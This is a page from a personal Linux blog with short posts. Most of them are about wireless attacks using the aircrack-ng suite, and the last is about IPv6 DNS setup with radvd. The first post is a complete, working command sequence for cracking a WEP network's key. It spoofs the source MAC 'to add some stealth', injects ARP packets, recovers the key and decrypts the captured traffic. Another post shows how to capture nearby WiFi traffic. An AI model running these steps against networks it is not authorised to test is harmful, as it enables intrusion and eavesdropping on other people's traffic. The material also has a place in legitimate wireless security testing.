Mar 19
TomLinux General, Networking, Wireless
Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…
- Stop network manager: /etc/init.d/network-manager stop
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
- aireplay-ng –fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one mon0
- aireplay-ng –arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 –ignore-negative-one -e SSID mon0
- when this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0
Mar 17
TomLinux General, Networking, Wireless
This is easier and more effective than packet sniffing on a wired network:
- Stop Network Manager: /etc/init.d/network-manager stop
- Set your WiFi card into monitoring mode: airmon-ng start wlan0
- See what’s around: airodump-ng mon0
- Select a target network, and note the BSSID value and channel (used as ‘-c’ option below)
- Collect the packet trace: airodump-ng -c 6 –bssid 00:12:34:56:78:90 -w output-file mon0
- Examine packet trace: wireshare output-file.cap
(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)
Mar 17
TomLinux General, Networking, Wireless
Very simple way to test if your WiFi card supports injection:
Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0
With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!
I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000
Mar 17
TomLinux General, Networking, Wireless
After discovering that Aircrack-ng isn’t currently included in Debian Wheezy (but it is in both Stable and Sid), I grabbed the latest version out of SVN (v1.1 – r2128) and built the package for my x86-64 system.
Source and compiled executables are available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to /usr/local/sbin/ – so they will be easy to remove when the aircrack-ng packages becomes available in Wheezy.
Feb 20
TomIPv6, Linux System Administration, Networking
DNS client configuration can be handled by the standard Router Advertisement Daemon (radvd) – apt-get install radvd
Edit /etc/radvd.conf on your Linux Router and insert the following at the end of the file to use Google’s DNS Caching server:
RDNS 2001:4860:4860::8888
{
};
On your Linux clients install rdnssd. To automatically add the advertised IPv6 DNS servers to your /etc/resolv.conf
The /etc/resolv.conf now contains both IPv4 and IPv6 entries. Typically a DHCP client is adding the IPv4 DNS server entries, this can be prevented by removing ‘domain-name-servers’ from the ‘request’ line in dhclient.conf
Older Entries Newer Entries
RSS